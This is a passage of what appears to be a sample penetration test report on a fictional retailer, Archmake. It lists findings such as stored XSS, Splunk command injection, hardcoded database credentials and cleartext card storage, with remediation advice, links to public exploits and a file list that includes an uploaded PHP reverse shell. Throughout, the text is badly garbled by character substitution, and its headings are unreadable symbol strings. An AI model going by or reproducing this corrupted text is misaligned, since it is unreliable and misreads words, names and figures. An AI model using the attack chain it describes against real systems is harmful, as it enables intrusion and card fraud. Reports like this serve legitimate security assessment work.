provlded Lhe aLLacker wlLh Lhe ablllLy Lo sLeal funds from Archmake, maklng Lhls aLLack boLh very damaglng and very aLLracLlve. 7%/'44%*<"+1'*, uue Lo Lhe lmpacL Lo Lhe overall organlzaLlon as uncovered by Lhls peneLraLlon LesL, approprlaLe resources should be allocaLed Lo ensure LhaL remedlaLlon efforLs are accompllshed ln a Llmely manner. Whlle a comprehenslve llsL of lLems LhaL should be lmplemenLed ls beyond Lhe scope of Lhls engagemenL, some hlgh level lLems are lmporLanL Lo menLlon. 1. ;B-F"B"#$ &#H "#/(%2" 'B-F"B"#$&$'(# (/ 2P&#M" 2(#$%(F &2%(++ &FF +4+$"B+: MlsconflguraLlon and lnsecure deploymenL lssues were dlscovered across Lhe varlous sysLems. 1he vulnerablllLles !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 24 of 32 LhaL arose can be mlLlgaLed Lhrough Lhe use of change conLrol processes on all server sysLems. 2. ;B-F"B"#$ %"M3F&% /'%"Q&FF %3F" +"$ %"0'"Q+: 8evlew Lhe flrewall rule seL on a regular basls Lo ensure LhaL all sysLems open Lo lnLernal Lrafflc conLlnue Lo have a buslness reason Lo exlsL. We recommend LhaL nlS1 S 800-41 7 be consulLed for guldellnes on flrewall conflguraLlon and LesLlng. 3. ;B-F"B"#$ & -&$2P B&#&M"B"#$ -%(M%&B: CperaLlng a conslsLenL paLch managemenL program per Lhe guldellnes ouLllned ln nlS1 S 800-40 8 ls an lmporLanL componenL ln malnLalnlng good securlLy posLure. 1hls wlll help Lo llmlL Lhe aLLack surface LhaL resulLs from runnlng unpaLched lnLernal servlces. 4. 7(#H32$ %"M3F&% 03F#"%&K'F'$4 &++"++B"#$+: As parL of an effecLlve organlzaLlonal rlsk managemenL sLraLegy, vulnerablllLy assessmenLs should be conducLed on a regular basls. uolng so wlll allow Lhe organlzaLlon Lo deLermlne lf Lhe lnsLalled securlLy conLrols are lnsLalled properly, operaLlng as lnLended, and produclng Lhe deslred ouLcome. ConsulL nlS1 S 800-30 9
for guldellnes on operaLlng an effecLlve rlsk managemenL program. 3. ,"+$%'2$ #"$Q(%D &22"++ $( +"%0"% B&#&M"B"#$ '#$"%/&2"+: roper neLwork segmenLaLlon wlll reduce exposure Lo lnLernal aLLacks agalnsL Lhe server envlronmenL. CperaLlng a well-deslgned uMZ wlll allow Archmake Lo conducL lLs e-commerce buslness ln a manner LhaL does noL expose lnLernal sysLems Lo aLLack. ConsulL llS 191 10 for guldellnes on securlng local area neLworks. 6. ,"+$%'2$ &22"++ $( 2%'$'2&F +4+$"B+: lL ls recommended LhaL Lhe daLabase server be lsolaLed from oLher sysLems. lf posslble, a whlLellsL of daLabase commands should be lmplemenLed speclfylng Lhe mlnlmum number of commands requlred Lo supporL buslness operaLlons. 1hls ls lnllne wlLh Lhe sysLem deslgn concepL of leasL prlvllege, and wlll llmlL Lhe amounL of damage an aLLacker can lnfllcL on corporaLe resources. ConsulL nlS1 S 800-27 8evA 11 for guldellnes on achlevlng a securlLy basellne for l1 sysLems. 7. :--F4 '#H3+$%4 B"$P(H(F(M'"+ /(% +"23%" +(/$Q&%" H"+'M#: 1he use of hard coded credenLlals wlLhln cusLom appllcaLlons ls hlghly dlscouraged. users should have a need Lo know, and be
7 hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-41-8ev1/sp800-41-rev1.pdf 8 hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-40-ver2/S800-40v2.pdf 9 hLLp://csrc.nlsL.gov/publlcaLlons/ubsurafLs.hLml#S-800-30-8ev.201 10 hLLp://csrc.nlsL.gov/publlcaLlons/flps/flps191/flps191.pdf 11 hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-27A/S800-27-8evA.pdf !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 23 of 32 requlred Lo provlde, credenLlals before accesslng confldenLlal and proprleLary daLa. 1hls provldes beLLer securlLy, and an audlL Lrall LhaL allows Lhe buslness Lo Lle acLlons Lo speclflc user accounLs. lor deLalls on Lhe speclflc explolLed vulnerablllLles, please see Appendlx A. 71,9 7"+1*? 1he overall rlsk posed Lo Archmake as a resulL of Lhls peneLraLlon LesL ls ='MP. A non-LargeLed aLLacker has Lhe poLenLlal Lo damage Lhe company ln a manner LhaL would have dlrecL operaLlonal and flnanclal lmpacL.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 26 of 32 8>>%*<1. 8H D0$*%5"#1$1+6 F%+"1$ "*< C1+1?"+1'* 71,9 7"+1*? 3/"$% ln accordance wlLh nlS1 S 800-30, dlscovered vulnerablllLles are ranked based upon llkellhood and lmpacL Lo deLermlne overall rlsk. @*>5'+%/+%< ;=I8<41* 8//%,, 8aLlng: ='MP AffecLed SysLem: www.Archmake.com uescrlpLlon: Access Lo Lhe www.Archmake.com admlnlsLraLlve lnLerface ls only proLecLed by a username and password comblnaLlon. lL ls suggesLed besL pracLlce Lo only allow speclflc hosLs access Lo any admlnlsLraLlve lnLerface. lmpacL: lf an aLLacker ls able Lo obLaln valld credenLlals or a valld sesslon Lo Lhe admlnlsLraLlve lnLerface, Lhere are no addlLlonal conLrols ln place Lo prevenL prlvllege escalaLlon. ln Lhe course of Lhls peneLraLlon LesL, addlLlonal layers of defense aL Lhls layer would have mlLlgaLed Lhe lnlLlally dlscovered fooLhold galned by Lhe aLLackers. 8emedlaLlon: lmplemenL conLrols Lo only allow connecLlons Lo Lhe admlnlsLraLlve lnLerface from known hosLs. A poLenLlal meLhod for achlevlng Lhls could be Lhrough only allowlng access from cllenLs LhaL are behlnd Lhe company vn or a whlLellsL of known LrusLed hosLs. D0$*%5"#$% ;'5<=5%,, 3%"5/G =$0?1* 8aLlng: ='MP AffecLed SysLem: www.Archmake.com uescrlpLlon: 1he www.Archmake.com sysLem ls operaLlng wlLh a vulnerable Wordress plugln (8elevanssl user Searches) LhaL lnLeracLs wlLh Lhe publlc search funcLlon of Lhe slLe. 1hls vulnerablllLy ls explolLed by sLorlng [avascrlpL, whlch ls Lhen execuLed as a sLored xSS vulnerablllLy. ubllc LxplolL: hLLp://www.explolL-db.com/explolLs/16233/ lmpacL: 1hls vulnerablllLy can be uLlllzed Lo obLaln a valld sesslon Lo Lhe Wordress admlnlsLraLlon lnLerface, provldlng Lhe aLLacker wlLh admlnlsLraLlve access of Lhe !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 27 of 32 overall sysLem. 8emedlaLlon: updaLe Lhe 8elevanssl plugln Lo a verslon greaLer Lhan 2.7.2. ;%#,%52%5 JK1> D0$*%5"#1$1+6 8aLlng: ='MP AffecLed SysLem: www.Archmake.com uescrlpLlon: 1he verslon of bzlp2 runnlng on Lhe remoLe sysLem ls vulnerable Lo a race condlLlon, LhaL when properly explolLed resulLs ln arblLrary code execuLlon. ubllc LxplolL: hLLp://www.explolL-db.com/explolLs/18147/ lmpacL: 8y uLlllzlng a publlc explolL for Lhls flaw, rooL level prlvlleges can be obLalned. 8emedlaLlon: Apply vendor-supplled paLches Lo updaLe bzlp2 Lo a verslon greaLer Lhan 1.0.3-6. D0$*%5"#$% 3>$0*9 E*,+"$$"+1'* 8aLlng: ='MP AffecLed SysLem: 10.10.0.3 uescrlpLlon: 1he verslon of Splunk on Lhe remoLe hosL ls vulnerable Lo remoLe command ln[ecLlon. ubllc LxplolL: hLLp://www.explolL-db.com/explolLs/18243/ lmpacL: An unauLhenLlcaLed remoLe user wlLh access Lo Lhe Splunk hosL can execuLe commands as Local SysLem user. 8emedlaLlon: updaLe Lhe Splunk lnsLallaLlon Lo verslon 4.2.3 or hlgher. L"5</'<%< @,%5*"4% "*< =",,M'5< 1* -.%/0+"#$% 8aLlng: ='MP AffecLed SysLem: 10.10.0.3 uescrlpLlon: 1he exporLcsv.exe appllcaLlon on Lhe remoLe hosL was found Lo be operaLlng wlLh daLabase credenLlals hardcoded lnLo Lhe appllcaLlon. lmpacL: 8y exLracLlng Lhe credenLlals from Lhe appllcaLlon, dlrecL connecLlons Lo Lhe daLabase server were posslble. 1he credenLlals had admlnlsLraLlve level access, whlch provldes full conLrol over Lhe daLabase conLenLs. 1hls has Lhe effecL of granLlng LoLal conLrol of Lhe backend sysLem Lo Lhe aLLacker. 8emedlaLlon: ueploy lnLeracLlve auLhenLlcaLlon as parL of Lhe appllcaLlon sLarL-up process. Pave unlque username/password comblnaLlons for each enLlLy LhaL accesses Lhe !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 28 of 32 sysLem. CreaLe a whlLellsL of Lhe leasL number of requlred commands LhaL are permlLLed for each accounL. F"+"#",% @*,"$+%< =",,M'5< 3+'5"?% 8aLlng: ='MP AffecLed SysLem: 10.10.0.3 uescrlpLlon: asswords sLored on Lhe daLabase server were dlscovered Lo be unsalLed 12 . lmpacL: 8y sLorlng passwords wlLhouL salLlng Lhem, bruLe force aLLacks agalnsL Lhe sysLem were able Lo obLaln Lhe clear LexL values wlLh mlnlmal efforL. ln Lhls lnsLance, lL provlded Lhe aLLackers wlLh Lhe clear LexL passwords of Lhe vasL ma[orlLy of Archmake's cusLomers, lnLroduclng Lhem Lo Lhe poLenLlal of fuLure aLLacks. 8emedlaLlon: Make use of sLronger encrypLlon/hashes ln Lhe fuLure. Lnsure LhaL all approprlaLe measures are Laken Lo ensure Lhe securlLy of senslLlve daLa aL resL. @*>5'+%/+%< F"+"#",% 3%52%5 8aLlng: ='MP AffecLed SysLem: 10.10.0.3 uescrlpLlon: 1he daLabase server was found Lo be operaLlng on a flaL neLwork, whlch allowed connecLlons from Lhe local LAn. uue Lo Lhe senslLlvlLy of Lhls sysLem, addlLlonal conLrols should be puL lnLo place Lo ensure lLs proLecLlon. lmpacL: Cnce credenLlals Lo Lhe daLabase server were dlscovered, lL was Lrlvlal Lo obLaln full conLrol over Lhe sysLem. 1hls resulLed ln a much greaLer lmpacL Lo Lhe organlzaLlon. 8emedlaLlon: lmplemenL addlLlonal layers of defense for Lhe daLabase server. 1hls may lnclude movlng Lhe daLabase server Lo a separaLe neLwork and sLrlcLly conLrolllng lngress and egress Lrafflc Lo lL. F"+"#",% )'*+"1*, @*%*/56>+%< )5%<1+ )"5< :04#%5, 8aLlng: ='MP AffecLed SysLem: 10.10.0.3
12 hLLp://en.wlklpedla.org/wlkl/SalL_(crypLography) !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 29 of 32 uescrlpLlon: lL was dlscovered LhaL ln Lhe course of LransacLlon processlng, credlL card numbers are sLored ln clear LexL on Lhe daLabase server for a brlef perlod of Llme. lmpacL: Whlle Lhe Llme LhaL credlL card numbers are ln Lhe daLabase ls shorL, lL was enough of an exposure Lo allow Lhe aLLackers Lo obLaln Lhem on a conslsLenL basls. 1hls compromlsed Lhe lnLegrlLy of all credlL cards LhaL are processed by Lhe sysLem. 8emedlaLlon: 1he deslgn and archlLecLure of Lhe LransacLlon processlng sysLem should be revlewed. 1hls revlew wlll ldenLlfy whlch addlLlonal conLrols should be puL ln place Lo beLLer proLecL cusLomer daLa. B"/9 '( !5"*,"/+1'* D%51(1/"+1'* 8aLlng: ='MP AffecLed SysLem: 10.10.0.3 uescrlpLlon: no verlflcaLlon was ln place Lo valldaLe Lhe source of LransacLlons submlLLed Lo Lhe daLabase for processlng. lmpacL: 8y noL valldaLlng Lhe lnLegrlLy of Lhe submlLLed LransacLlons, lL was posslble for Lhe aLLackers Lo submlL arblLrary LransacLlons and have Lhem processed by Lhe sysLem as lf Lhey were auLhenLlc. ln Lhe course of Lhe peneLraLlon LesL, Lhls vulnerablllLy allowed refunds Lo be processed agalnsL aLLacker-supplled credlL cards. 8emedlaLlon: ConLrols should be added Lo verlfy Lhe lnLegrlLy of LransacLlons before processlng. 33L N%6 A1$%, *'+ =",,M'5< =5'+%/+%< 8aLlng: >"H'3B AffecLed SysLem: www.Archmake.com uescrlpLlon: Cnce rooL prlvlleges were obLalned, lL was posslble Lo make use of Lhe lnsLalled ssh key flles as Lhey were noL password proLecLed. lL ls consldered besL pracLlce Lo proLecL ssh key flles Lhrough Lhe use of passwords. lmpacL: 8y uLlllzlng Lhe exlsLlng ssh key flles and ssh Lunnels, lL was posslble Lo remoLely access Lhe sysLem wlLhouL alLerlng Lhe rooL user's password. 1hls mlnlmlzed Lhe !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 30 of 32 chances of belng deLecLed. 8emedlaLlon: use passwords Lo proLecL all ssh key flles. O0+#'0*< 8//%,, (5'4 ;%#,%52%5 8aLlng: >"H'3B AffecLed SysLem: www.Archmake.com uescrlpLlon: 1he www.Archmake.com sysLem was dlscovered Lo allow ouLbound connecLlons Lo speclflc porLs. Whlle some fllLerlng ls ln place, ouLbound connecLlons Lo 1C porL 33 were dlscovered Lo be open. lL ls besL pracLlce Lo only allow Lrafflc from exLernally lnlLlaLed connecLlons Lo valld server porLs. lmpacL: 1he permlLLed ouLbound connecLlons were used Lo esLabllsh lnLeracLlve access Lo Lhe lmpacLed sysLem. lf Lhls were noL allowed, Lhe aLLacker's ablllLles would have been lmpalred. 8emedlaLlon: Lmploy egress fllLerlng ln Lhe uMZ Lo only allow servers Lo lnlLlaLe connecLlons Lo speclflc hosLs on speclflc porLs. ;'5<=5%,, @>$'"< =$0?1* E*2"$1< A1$% !6>% )G%/9, 8aLlng: 6(Q AffecLed SysLem: www.Archmake.com uescrlpLlon: 1he admln upload plugln has lmplemenLed flle Lype checklng ln a manner LhaL ls lneffecLlve. lmpacL: lmpacL of Lhls lssue ls low due Lo Lhe facL LhaL only admlnlsLraLlve users have access Lo Lhls funcLlonallLy. 1hls flaw was uLlllzed Lo ease Lransferrlng flles Lo Lhe lmpacLed sysLem. lf Lhls lssue was correcLed, alLernaLlve means for flle Lransfer would have been uLlllzed. 8emedlaLlon: CorrecL flle Lype checklng or dlsable Lhe plugln lf Lhe funcLlonallLy ls noL requlred.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 31 of 32 8>>%*<1. JH B1,+ '( )G"*?%, 4"<% +' 85/G4"9% 36,+%4, 1he followlng flles were alLered or creaLed as parL of Lhls peneLraLlon LesL. Speclflc deLalls of how or why Lhese flles were alLered ls lncluded ln Lhe ALLack narraLlve. www.Archmake.com: /rooL/.ssh/auLhorlzed_keys llles uploaded lnLo /var/www/wp-conLenL/uploads: o face.png o php-reverse-shell.png.php o race.png 10.10.0.3: All flles locaLed ln C:\users\hacker\uownloads Wlndows domaln: hacker" user creaLed
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 32 of 32 8>>%*<1. )H 8#'0+ O((%*,12% 3%/051+6 Cffenslve SecurlLy advocaLes peneLraLlon LesLlng for lmpacL as opposed Lo peneLraLlon LesLlng for coverage. eneLraLlon LesLlng for coverage has rlsen ln popularlLy ln recenL years as a slmpllfled meLhod for companles Lo meeL regulaLory needs. As a form of vulnerablllLy scannlng, peneLraLlon LesLlng for coverage lncludes selecLlve verlflcaLlon of dlscovered lssues Lhrough explolLaLlon. 1hls allows servlce provlders Lo conducL Lhe work largely Lhrough Lhe use of auLomaLed LoolseLs and malnLaln conslsLency of producL across mulLlple engagemenLs. eneLraLlon LesLlng for lmpacL ls a form of aLLack slmulaLlon under conLrolled condlLlons. 1hls more closely mlmlcs Lhe real world, LargeLed aLLack LhreaL LhaL organlzaLlons face on a day-Lo-day basls. eneLraLlon LesLlng for lmpacL ls goal-based assessmenLs LhaL ldenLlfles more Lhan a slmple vulnerablllLy lnvenLory, buL lnsLead provldes Lhe Lrue buslness lmpacL of a breach. An lmpacL-based peneLraLlon LesL ldenLlfles areas for lmprovemenL LhaL wlll resulL ln Lhe hlghesL raLe of reLurn for Lhe buslness. eneLraLlon LesLlng for lmpacL poses Lhe challenge of requlrlng a hlgh sklllseL Lo successfully compleLe. As demonsLraLed ln Lhls sample reporL, Cffenslve SecurlLy belleves LhaL lL ls unlquely quallfled Lo dellver world-class resulLs when conducLlng peneLraLlon LesLs for lmpacL due Lo Lhe level of experLlse found wlLhln our Leam of securlLy professlonals. Cffenslve securlLy does noL malnLaln a separaLe Leam for peneLraLlon LesLlng and oLher acLlvlLles LhaL Lhe company ls engaged ln. 1hls means LhaL Lhe same lndlvlduals LhaL are lnvolved ln Cffenslve SecurlLy's lndusLry leadlng performance-based Lralnlng, Lhe producLlon of lndusLry sLandard Lools such as 8ack1rack Llnux, auLhors of besL selllng books, and malnLalners of lndusLry references such as LxplolL-u8 are Lhe same lndlvlduals LhaL are lnvolved ln Lhe dellvery of servlces. Cffenslve SecurlLy offers a producL LhaL cannoL be maLched ln Lhe currenL markeL. Powever, we may noL be Lhe rlghL flL for every [ob. Cffenslve SecurlLy Lyplcally conducLs consulLlng servlces wlLh a low volume, hlgh sklll raLlo Lo allow Cffenslve SecurlLy sLaff Lo more closely mlmlc real world slLuaLlons. 1hls also allows cusLomers Lo have lncreased access Lo lndusLry-recognlzed experLlse all whlle keeplng cosLs reasonable. As such, hlgh volume, fasL Lurn around engagemenLs, are ofLen noL a good flL. Cffenslve SecurlLy ls focused on conducLlng hlgh quallLy, hlgh lmpacL assessmenLs and ls acLlvely soughL ouL by cusLomers ln need of servlces LhaL cannoL be dellvered by oLher vendors. lf you would llke Lo dlscuss your peneLraLlon LesLlng needs, please conLacL us aL lnfo[offsec.com.